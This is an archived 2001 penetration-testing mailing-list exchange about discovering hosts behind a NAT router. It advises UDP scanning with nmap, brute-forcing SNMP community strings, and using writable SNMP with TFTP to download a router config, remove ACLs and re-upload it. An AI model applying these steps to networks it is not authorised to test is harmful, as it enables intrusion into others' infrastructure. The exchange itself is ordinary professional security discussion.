Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: RE: Discovering hosts behind NAT

RE: Discovering hosts behind NAT

From: Dawes, Rogan (ZA - Johannesburg) <rdawes_at_deloitte.co.za>
Date: Thu, 24 May 2001 07:46:40 +0200

That's a good suggestion.

If you can get writable SNMP access (try ADMsnmp as a nice bruteforcer), you
may also be able to get it to upload its config to you. Michal Zalewski
(IIRC) made a script that would set the appropriate SNMP variables, start a
TFTP server, and receive a config file. Having done that, you can modify it
to suit (remove ACL's, etc) and upload it again.

Rogan

-----Original Message-----
From: Javier Fernandez-Sanguino Peņa [mailto:jfernandez_at_sgi.es]
Sent: 23 May 2001 09:29
To: Franklin DeMatto
Cc: pen-test_at_securityfocus.com
Subject: Re: Discovering hosts behind NAT

>
> There are two known network devices: a cisco, which seems totally silent,
and a wellfleet router.
>

        Have you tried SNMP access? First try to check if the SNMP ports
(udp) are open
(nmap -sU) and then do a dictionary attack against the router. A common
misconfiguration is to have SNMP open to the outside world and with
well-known
communities.
        If so, you could probably get the information the router holds in
its internal
tables and (maybe) configure it to allow you access to the "hidden" network.

        Javi
Received on May 24 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos